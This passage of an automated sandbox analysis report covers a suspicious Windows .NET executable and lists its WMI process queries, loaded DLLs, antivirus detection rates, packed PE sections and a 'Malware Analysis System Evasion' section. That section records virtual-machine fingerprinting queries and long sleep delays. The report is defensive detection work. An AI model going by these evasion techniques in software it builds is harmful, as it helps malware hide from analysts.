            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1064
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5200
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6232
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6060
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3644
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 624
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5364
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6652
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1044
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4056
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6640
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6208
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5440
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2316
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3604
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2736
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4028
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5748
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1868
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1436
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1004
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6172
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4508
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4876
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4444
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7088
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1852
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 556
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6976
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2708
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5292
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1412
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3496
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 976
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5544
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3556
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1400
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 968
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4844
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1388
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2248
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4360
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3536
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6552
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1376
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3960
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1804
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2664
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3524
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2656
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5672
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4208
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1428
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2216
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6956
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 920
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 488
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1780
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6520
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2636
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6944
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2632
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1752
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1760
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6068
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 932
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6496
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3476
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6056
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1872
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5620
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4756
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1736
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3456
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 864
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 432
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Ls4O6Pmixd.exe | Virustotal: Detection: 41%
            Source: Ls4O6Pmixd.exe | ReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: napinsp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: pnrpnsp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: wshbth.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: nlaapi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: winrnr.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Ls4O6Pmixd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Ls4O6Pmixd.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: initial sample | Static PE information: section where entry point is pointing to: .hJL
            Source: Ls4O6Pmixd.exe | Static PE information: section name: .:"%
            Source: Ls4O6Pmixd.exe | Static PE information: section name: .W!:
            Source: Ls4O6Pmixd.exe | Static PE information: section name: .hJL
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00054A07 push rcx; ret 4_2_00054A1B
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00055D06 push rcx; ret 4_2_00055D07
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00054B14 push rcx; ret 4_2_00054B17
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00054A1F push rcx; ret 4_2_00054A20
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00054A35 push rcx; ret 4_2_00054A3F
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00054A43 push rcx; ret 4_2_00054A44
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00056C64 push 00000051h; ret 4_2_00056C74
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00054669 push rsi; iretd 4_2_0005467A
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00055D75 push rdx; iretd 4_2_00055D77
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00056C78 push 00000051h; ret 4_2_00056C7A
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00055A7A push rcx; ret 4_2_00055A7B
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_0005419C push FFFFFFEBh; retf 4_2_000541A8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00055DA0 push 5188B0F5h; ret 4_2_00055DA5
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00055DAE push rcx; ret 4_2_00055DAF
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000549D4 push rcx; ret 4_2_000549D8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000549D0 push rcx; ret 4_2_000549D3
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000543DF push rcx; ret 4_2_000543E0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000544EE push rcx; retf 4_2_000544F0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000549EE push rcx; ret 4_2_000549F7
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000553EB push rcx; ret 4_2_000553F6
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00055CFD push rcx; ret 4_2_00055D01
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000549FB push rcx; ret 4_2_000549FC
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_000553FA push rcx; ret 4_2_000553FB
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC53EB02 push eax; retf 4_2_00007FFAAC53EB49
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC53EABA push eax; retf 4_2_00007FFAAC53EB49
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Code function: 4_2_00007FFAAC526168 push edx; ret 4_2_00007FFAAC5261DB
            Source: Ls4O6Pmixd.exe | Static PE information: section name: .hJL entropy: 7.536963336777202
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Memory allocated: 890000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Memory allocated: 1A4A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599672
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599344
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599234
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599125
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 599011
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 598891
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 598778
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 598589
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 598454
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 598327
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 598098
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597958
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597718
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597592
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597483
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597374
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597265
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597156
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 597047
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 596828
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 596718
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 596609
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 596500
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 596388
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 596266
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Window / User API: threadDelayed 1564
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Window / User API: threadDelayed 3924
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599344s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -599011s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -598891s >= -30000s
